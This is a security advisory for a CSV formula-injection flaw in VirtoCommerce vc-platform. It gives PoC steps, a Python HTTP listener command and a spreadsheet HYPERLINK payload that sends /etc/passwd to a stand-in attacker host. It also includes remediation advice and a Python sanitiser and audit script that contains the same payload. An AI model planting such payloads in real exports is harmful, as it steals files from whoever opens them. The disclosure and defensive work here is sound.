WS-2021-0489
Date: December 15, 2021
Overview
In vc-platform (VirtoCommerce) 3.0.0-rc.1 to 3.79.0, an attacker with low privileges can create a new product whose title contains a spreadsheet formula. When an administrator later exports the catalog in CSV format, the Title field is written out without neutralising formula elements (CSV injection, CWE-1236). A spreadsheet application that opens the export may evaluate the formula, which can lead to execution of arbitrary commands, or exfiltration of local files, on the machine on which the exported file is opened.
Details
The platform trusts product titles at export time. A user with a store manager role (not a platform administrator) can set the Name field of a product to a string beginning with "=", and the CSV exporter copies it verbatim into the Title column. The payload is not executed by vc-platform itself; it is executed by the spreadsheet application of whoever opens the exported file, typically an administrator, so input from a low-privileged account crosses into the administrator's environment.
PoC Details
1. Log in to the application as a user with the manager role for the electronics store. This is considered low privilege: it is not an administrative role of the application.
2. In the left pane click "More", then "Catalog".
3. Open the "Clothing" section, then "Accessories", then select the bags section.
4. Create a new product: choose "physical product", insert the payload below in the Name field and click create.
5. Log in as admin, go to the same catalog page and click the "export" button -> VirtoCommerce Csv Export -> Start Export. A download link is provided.
6. Download the CSV file and open it in a spreadsheet application. Click the name of the new product (test-poc): you are sent to an unknown page, and the terminal of the attacker's server shows that the contents of the passwd file were sent there.
Note that the payload uses LibreOffice Calc syntax (the 'file:///...'#$sheet.A1 external reference and ";" as the argument separator); other spreadsheet applications parse formulas differently, so the exact behaviour depends on the application used to open the export.
PoC Code
Set up a server on the attacker host (serves the current directory over HTTP and logs every request, including the query string carrying the exfiltrated data):
python3 -m http.server yourPort --bind yourIP
Payload:
=HYPERLINK(CONCATENATE("http://yourIP:yourPort/123.txt?v="; ('file:///etc/passwd'#$passwd.A1)); "test-poc")
Affected Environments
3.0.0-rc.1 to 3.79.0
Remediation
To remediate, ensure that no cell written to the CSV export begins with any of the following characters, or escape such cells (for example by prefixing them with a single quote so the spreadsheet reads them as text):
Equals (“=”)
Plus (“+”)
Minus (“-”)
At (“@”)
Tab (0x09)
Carriage return (0x0D)
Quoting the cell in double quotes is not sufficient on its own: a quoted cell that starts with "=" is still evaluated as a formula by the spreadsheet application.
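As an added example (not code from the vc-platform project), the check above written as a small Python CSV export sanitiser, together with an audit function that scans an already produced export for cells that still start with a formula trigger. The product rows, the column names Sku/Name/Price and the embedded payload string are constructed sample data; the vulnerable and hardened exports are produced side by side so the audit can show the difference.

```python
import csv
import io

# Characters that make a spreadsheet application treat a CSV cell as a
# formula: the list from the Remediation section above.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample: the advisory's PoC payload as it would be submitted in
# the product Name field by the low-privileged user.
POC_PAYLOAD = (
    '=HYPERLINK(CONCATENATE("http://yourIP:yourPort/123.txt?v="; '
    "('file:///etc/passwd'#$passwd.A1)); \"test-poc\")"
)


def is_formula_cell(value):
    """True if a string cell would be evaluated as a formula when opened."""
    return isinstance(value, str) and value.startswith(FORMULA_TRIGGERS)


def neutralize_cell(value):
    """Prefix a dangerous text cell with a single quote so the spreadsheet
    reads it as a literal string. Non-string values are passed through."""
    if is_formula_cell(value):
        return "'" + value
    return value


def export_products(products, fieldnames=("Sku", "Name", "Price"), neutralize=True):
    """Write product dicts to CSV text. With neutralize=False this mirrors the
    vulnerable behaviour described in the advisory: csv.writer quotes and
    escapes at the CSV level, but a quoted "=..." cell is still a formula."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=list(fieldnames), lineterminator="\n")
    writer.writeheader()
    for product in products:
        row = {name: product.get(name) for name in fieldnames}
        if neutralize:
            row = {name: neutralize_cell(cell) for name, cell in row.items()}
        writer.writerow(row)
    return buf.getvalue()


def find_formula_cells(csv_text):
    """Audit an existing export: return (row_number, column, value) for every
    cell that begins with a formula trigger. Data rows are numbered from 1."""
    findings = []
    reader = csv.DictReader(io.StringIO(csv_text))
    for row_number, row in enumerate(reader, start=1):
        for column, value in row.items():
            if is_formula_cell(value):
                findings.append((row_number, column, value))
    return findings


# Constructed sample catalogue: one benign product and the attacker's product.
SAMPLE_PRODUCTS = [
    {"Sku": "BAG-001", "Name": "Leather tote", "Price": 49.0},
    {"Sku": "BAG-002", "Name": POC_PAYLOAD, "Price": 1.0},
]

if __name__ == "__main__":
    vulnerable = export_products(SAMPLE_PRODUCTS, neutralize=False)
    hardened = export_products(SAMPLE_PRODUCTS)
    print("formula cells in vulnerable export:", find_formula_cells(vulnerable))
    print("formula cells in hardened export:", find_formula_cells(hardened))
    print(hardened)
```

The single-quote prefix also neutralises legitimate strings such as "-5" or "+44 ...", and some spreadsheet applications display the quote rather than hiding it, so apply it to free-text columns (titles, descriptions) rather than to numeric columns, or document the prefix for consumers of the export. The audit function is the check to run against an existing export before handing it to anyone who will open it in a spreadsheet.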
Prevention
No fix.
Language: C#
Good to know:
Improper Neutralization of Formula Elements in a CSV File
CWE-1236
Upgrade Version
No fix version available
Base Score: 9.0 (Critical), as computed with the CVSS v3.x base formula from the following metrics:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): High
Integrity (I): High
Availability (A): High